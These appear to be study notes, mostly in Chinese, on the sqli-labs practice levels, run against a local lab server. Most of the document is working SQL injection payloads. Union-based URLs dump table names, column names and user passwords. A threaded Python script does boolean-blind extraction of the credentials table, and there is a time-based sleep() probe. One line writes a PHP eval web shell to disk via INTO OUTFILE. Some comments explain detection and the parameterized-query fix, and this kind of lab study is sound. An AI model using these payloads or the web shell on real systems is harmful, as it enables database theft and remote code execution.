1-5
'''
进数据库之前还会解码，SQL 语法中的语句不会，字符串需要 hex 编码。
python的hex:先ascii 转换 再 hex
第一关
CONCAT_WS(sep,s1,s2...,sn)将s1,s2...,sn连接成字符串,并用sep字符间隔
concat_ws(@@version,database(),user())
获取所有数据库名
select 1,2,(select group_concat(schema_name) from information_schema.schemata)#
得到基本信息
union select 1,concat_ws(0x7C,@@version,database(),0x757365722829),3 #
数据库 hex
0x736563757269747927.
得表名
%27%20union%20select%201,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=0x7365637572697479),3%20%20%20%23
得字段名
id=-1%27%20union%20select%201,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_name=0x7573657273%20and%20table_schema=0x7365637572697479),3%20%20%20%23
得数据:
’ union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)%23
第三关
id=-1')order by 3 %23
爆字段
id=-1%27)union%20select%201,2,3%20%23
基本信息:
id=-1%27)union%20select%201,(select%20concat_ws(database(),@@version,user())),3%20%23
得表名
-1%27)union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479),3%20%23
得字段名:
id=-1%27)union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273%20and%20table_schema=0x7365637572697479),3
第四关:
爆出字段
http://127.0.0.1/sqli-labs-master/Less-4/?id=-1") union select 1,2,3 #
然后
(select group_concat(table_name) from information_schema.tables where table_schema=(select database()))
最后 得数据
select group_concat() from
6-9
import requests
'''
第6关
http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and 0 or (length(database())=8) #
'''
'''
第7关
http://127.0.0.1/sqli-labs-master/Less-7/?id=2%27))%20and%200%20or%20(length(database())=8)%23
'''
'''
第8关 完整
'''
import requests
from multiprocessing.dummy import Pool
# Shared result buffer: pool workers append one recovered character per
# matching probe (see expoit/main below), so its contents are in completion
# order, not position order.
messagr=[]
# database name
#poc="http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or "+'(ascii(substr((select database()),%d,1))=%d)'
# table names, 29 characters
# 29 chars: http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or (length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=29)#
poc="http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or "+'(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))=%d)'
# column names, 20 (the length probe on the next line checks 122)
#http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or (length((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=database()))=122) #
poc="http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or "+'(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=database()),%d,1))=%d)'
# row data: 218 characters
#http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or (length((select group_concat(id,0x7c,username,0x7c,password) from security.users))=218) #
poc="http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or"+' (ascii(substr((select group_concat(id,0x7c,username,0x7c,password) from security.users),%d,1))=%d)'
# NOTE: the three `poc` assignments above are plain reassignments, so only the
# last one (the row-data probe) is live when main() runs; the earlier two are
# effectively history. Each template is a boolean-based blind predicate on the
# `id` parameter of the local sqli-labs lab target; the root cause on the
# server side is an unparameterized query, and binding `id` as a query
# parameter closes the whole channel.
def expoit(start: int, num: int, poc: str) -> None:
    """Send one blind-SQLi probe and record the character if it matched.

    Args:
        start: 1-based character position substituted into the ``substr``
            call inside ``poc``.
        num: candidate ASCII code substituted into the ``=%d`` comparison.
        poc: URL template with two ``%d`` placeholders (see the module-level
            ``poc`` assignments).

    Side effects: one HTTP GET per call; on a match, appends ``chr(num)`` to
    the module-level ``messagr`` list and prints the buffer collected so far.
    """
    # Un-escape spaces so the %-formatting below works on the raw query text.
    poc=poc.replace('%20',' ')
    # Fill in (position, ascii code) and append the URL-encoded " #" suffix.
    poc=poc%(start,num)+'%20%23'
    # print(poc)
    response=requests.get(poc)
    # The page's "You are in" text is the true/false oracle for the predicate;
    # from the defender's side, the same response marker is what makes the
    # probe distinguishable, so a generic error page removes the oracle.
    if 'You are in' in response.text:
        # Called from pool workers (see main), so the printed string reflects
        # whichever responses completed first, not character order.
        messagr.append(chr(num))
        print('数据库:',''.join(messagr))
def main(starts: int) -> None:
    """Fan out probes for every position 1..starts over a thread pool.

    Args:
        starts: number of character positions to probe.

    For each position, every ASCII code 31..127 is tried (97 GETs per
    position), so the run costs roughly 97 * starts requests, all to the
    same path with only the injected ``id`` predicate varying. That burst
    pattern is what a rate limiter or WAF rule should key on; the fix that
    makes the probes meaningless is parameterizing the query on the server.
    """
    pool=Pool()
    for start in range(1,starts+1):
        for num in range(31,128):
            # Uses the module-level `poc` (the last assignment above).
            pool.apply_async(expoit,args=(start,num,poc))
    pool.close()
    pool.join()
if __name__ == '__main__':
    # 218 is the string length measured by the `length(...)=218` probe in
    # the comment above the live `poc` assignment.
    main(218)
'''
select "<?php @eval($_POST['giantbranch']);?>" into outfile "XXX\test.php"
'''
'''
9 10
无回显，只能用 sleep() 来测试
http://localhost/sqli-labs/Less-9/?id=1' and if(ascii(substr(database(),1,1))>115, 0, sleep(5)) %23
'''